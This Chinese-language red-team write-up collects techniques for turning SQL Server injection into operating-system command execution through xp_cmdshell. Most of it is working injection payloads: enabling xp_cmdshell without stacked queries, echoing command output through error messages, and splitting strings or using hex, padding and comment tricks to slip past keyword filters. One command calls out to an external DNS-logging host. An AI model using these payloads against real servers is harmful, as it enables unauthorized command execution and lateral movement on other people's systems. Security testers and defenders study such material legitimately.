背景:在漏洞挖掘中,合理的利用sql注入,可以把注入转换成rce,使一个高危漏洞变成严重漏洞。在红蓝对抗中,利用注入rce,实现内网横向移动。笔者基于漏洞挖掘和红蓝对抗上遇到的sql server注入做了个sql server的rce实践总结。
1.如何判断sql server是否可以rce?
select user;
权限为dbo
确定当前用户是否为管理员:
SELECT IS\_SRVROLEMEMBER('sysadmin')
只有是sysadmin组的sql server账号才能执行系统命令
2.sql server 命令执行 xp_cmdshell扩展
exec master..xp\_cmdshell 'ping a43bade1.ipv6.bypass.eu.org'
直接执行会报错,尝试开启xp_cmdshell:
在高版本的sql server中已经无法使用xp_cmdshell ,测试版本sql server2017.
切换sql server为2008:
开启xp_cmdshell:
EXEC sp\_configure 'show advanced options', 1;RECONFIGURE;EXEC sp\_configure 'xp\_cmdshell', 1;RECONFIGURE;
3.sql server特性:
数字+字符串,不会报错 sql server会认为id=1and 1=1 就是id=1和and 1=1,自动会做处理
4.变量声明特性 DECLARE
不需要set也能声明变量使用:
1\> DECLARE @bc varchar (8000) \= 0x6f72616e6765;
2\> select \* from Inventory where name\=@bc;
3\> go
bypass:允许空格脏数据
DECLARE @i varchar (8000) \= 0x6f72616e6765202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020
2\> select \* from Inventory where name\=@i;
3\> go
不影响执行,原因在于数据后面的空格会被处理掉:
1\> select \* from Inventory where name\="orange";
2\> select \* from Inventory where name\="orange
完全不影响执行
数据前后支持填充00 bypass:
1\> DECLARE @i varchar (8000) \= 0x0000000000000000000000006f72616e6765000000000000000000000000000000
2\> select \* from Inventory where name\=@i;
3\> go
不会影响数据正常执行
5.sql server不支持堆叠也可以rce:
支持查询显示的sql server注入,不支持堆叠也可以rce:
select \* from student where name\='test'INSERT temp\_abcdzxc(data) EXEC master..xp\_cmdshell 'whoami' select '1'
select \* from student where name\='test'INSERT temp\_abcdzxc(data) EXECute master..xp\_cmdshell 'ipconfig'\-- 123
ipconfig内容很大,会自动分行:
使用execute bypass:
如果命令执行的语句包含空格,那么需要双引号包裹:
execute('xp\_cmdshell "nslookup baidu.com"')
一些变形:
支持换行空格填充
execute('xp\_c'+'md' +
'sh'+'ell'+' w'+'ho'+'ami')
更大的变形bypass:
execute('xp\_c'+'md' +
'sh'+'ell'+'
'+'"nslookup baidu.com"')
关键字检测的变形:
execute('xp\_c'+'md' +
'sh'+'ell'+'
'+'"nsl'+'ookup ba'+'idu.com"')
执行图在下方:
6.实战利用 不支持堆叠的情况下,可以进行报错注入回显 条件:支持sql语句报错
以数字类型sql注入为例:
第一步创建sql:
select \* from student where id\=1CREATE TABLE test\_exec(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100))
第二步:
执行存储过程命令执行插入数据到相关列中:
select \* from student where id\=1 INSERT into test\_exec(data) execute('xp\_cmdshell whoami')
第三步:
通过sql报错回显命令:
select \* from student where id\=1 and 1\=convert(int,(select data from test\_exec where id\=1))
成功执行命令
7.sql server不支持堆叠开启xp_cmdshell:
第一步:关闭xp_cmdshell:
RECONFIGURE;EXEC sp\_configure 'xp\_cmdshell',0
execute('xp\_cmdshell "nslookup baidu.com"')
第二步:不支持堆叠的情况下启动xp_cmdshell:
以字符串注入为例子:
select \* from student where name\='ddd' execute('EXEC sp\_configure "xp\_cmdshell",1')
select \* from student where name\='ddd' execute('RECONFIGURE')
再次执行命令,执行成功没用到分号:
方法2:使用exec执行存储过程 用于过滤括号()的场景:
select \* from student where name\='ddd' exec sp\_configure xp\_cmdshell,1
select \* from student where name\='ddd' RECONFIGURE
成功执行命令
8.hw实战案例,过滤(),=,空格 ,进行盲注执行命令例子:
因为过滤了空格无法使用声明变量的方式执行命令
select \* from student where name\='ddd'/\*\*/exec/\*\*/sp\_configure/\*\*/xp\_cmdshell,1
select \* from student where name\='ddd'/\*\*/RECONFIGURE
因为过滤空格,所以执行命令需要使用特殊办法规避空格
execute('xp\_cmdshell/\*\*/"nslookup%CommonProgramFiles:~10,-18%baidu.com"')
9.关闭高级扩展不彻底导致的rce:
exec sp\_configure 'show advanced options',0
RECONFIGURE
exec xp\_cmdshell "whoami"
问题导致的原因:
10.判断是否支持声明变量的办法:
延迟2s
select \* from student where name\='ddd' declare @i varchar(3000)\=0x77616974666F722064656C61792027303A303A3227 execute(@i)
如果支持执行命令:
玩法巨多,说一种bypass的:
select \* from student where name\='ddd' declare @i varchar(3000)\=0x6e736c6f6f6b75702062616964752e636f6d00000000
exec\-- 123
xp\_cmdshell
@i
成功执行命令:
11.判断是否支持堆叠查询:
1.产生延迟
select \* from student where name\='ddd';waitfor delay '0:0:2'\-- 123
2.返回200 和返回异常
select \* from student where name\='ddd'select '1'
select \* from student where name\='ddd'select EXP(111111)\-- 123
图在下方:
12.补充 []字符串:今早chybeta给我发了个文章,我补充下[]的内容:
使用[]字符串 bypass:
TRANSLATE with x
English
TRANSLATE with
COPY THE URL BELOW
Back
EMBED THE SNIPPET BELOW IN YOUR SITE
Enable collaborative features and customize widget: Bing Webmaster Portal
Back